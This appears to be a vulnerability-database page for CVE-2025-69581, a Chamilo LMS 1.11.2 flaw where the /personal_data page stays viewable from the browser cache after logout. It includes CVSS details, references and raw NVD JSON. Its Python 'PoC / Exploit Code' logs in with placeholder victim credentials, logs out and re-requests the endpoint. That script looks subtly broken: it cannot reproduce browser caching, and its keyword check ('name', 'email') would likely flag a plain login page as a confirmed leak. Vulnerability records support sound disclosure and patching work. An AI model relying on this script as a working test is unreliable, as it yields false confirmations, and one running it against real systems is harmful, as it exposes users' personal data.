CVE-2025-69581

Description

An issue was discovered in Chamillo LMS 1.11.2. The Social Network /personal_data endpoint exposes full sensitive user information even after logout because proper cache-control is missing. Using the browser back button restores all personal data, allowing unauthorized users on the same device to view confidential information. This leads to profiling, impersonation, targeted attacks, and significant privacy risks.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:1.11.2:*:*:*:*:*:*:* - VULNERABLE

Chamillo LMS 1.11.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-69581 PoC - Chamillo LMS Sensitive Information Disclosure
# This PoC demonstrates the information disclosure vulnerability via browser cache

import requests
import time

TARGET_URL = "http://target-server/chamilo-lms"
PERSONAL_DATA_ENDPOINT = f"{TARGET_URL}/social/personal_data"

def exploit_cve_2025_69581():
    """
    Steps to exploit the vulnerability:
    1. Authenticate as a legitimate user
    2. Access the personal_data endpoint to trigger caching
    3. Logout from the application
    4. Use browser back button or directly access the cached endpoint
    5. Sensitive information will be displayed without authentication
    """
    
    session = requests.Session()
    
    # Step 1: Login as a legitimate user
    login_data = {
        "username": "victim_user",
        "password": "victim_password"
    }
    login_response = session.post(f"{TARGET_URL}/login", data=login_data)
    
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False
    
    print("[+] Successfully logged in")
    
    # Step 2: Access personal_data endpoint to trigger caching
    personal_data_response = session.get(PERSONAL_DATA_ENDPOINT)
    
    if personal_data_response.status_code == 200:
        print("[+] personal_data endpoint accessed, content cached by browser")
        print(f"[+] Response headers: {personal_data_response.headers}")
    
    # Step 3: Logout
    logout_response = session.post(f"{TARGET_URL}/logout")
    print("[+] User logged out")
    
    # Step 4: Try to access the cached endpoint without authentication
    # In real scenario, this would be done via browser back button
    # The server may reject, but browser will show cached content
    unauthenticated_response = session.get(PERSONAL_DATA_ENDPOINT)
    
    # Check if response contains sensitive information
    sensitive_keywords = ["name", "email", "phone", "address", "profile"]
    for keyword in sensitive_keywords:
        if keyword.lower() in unauthenticated_response.text.lower():
            print(f"[!] Sensitive keyword '{keyword}' found in response")
            print("[!] Vulnerability confirmed: Information disclosure via cache")
            return True
    
    return False

if __name__ == "__main__":
    print("CVE-2025-69581 - Chamillo LMS Information Disclosure")
    print("=" * 50)
    exploit_cve_2025_69581()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69581
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69581
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69581/
[4] VulDB https://vuldb.com/cve/CVE-2025-69581
[5] https://github.com/Rivek619/CVE-2025-69581
[6] https://github.com/chamilo/chamilo-lms

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69581", "sourceIdentifier": "[email protected]", "published": "2026-01-16T20:15:49.287", "lastModified": "2026-02-05T21:46:04.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Chamillo LMS 1.11.2. The Social Network /personal_data endpoint exposes full sensitive user information even after logout because proper cache-control is missing. Using the browser back button restores all personal data, allowing unauthorized users on the same device to view confidential information. This leads to profiling, impersonation, targeted attacks, and significant privacy risks."}, {"lang": "es", "value": "Se descubrió un problema en Chamillo LMS 1.11.2. El endpoint /personal_data de la Red Social expone información sensible completa del usuario incluso después de cerrar sesión porque falta un control de caché adecuado. Usar el botón de retroceso del navegador restaura todos los datos personales, permitiendo a usuarios no autorizados en el mismo dispositivo ver información confidencial. Esto conduce a la elaboración de perfiles, suplantación de identidad, ataques dirigidos y riesgos significativos para la privacidad."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-524"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:1.11.2:*:*:*:*:*:*:*", "matchCriteriaId": "A3324481-48CB-4C31-881E-9487AB56DBC8"}]}]}], "references": [{"url": "https://github.com/Rivek619/CVE-2025-69581", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://github.com/chamilo/chamilo-lms", "source": "[email protected]", "tags": ["Product"]}]}}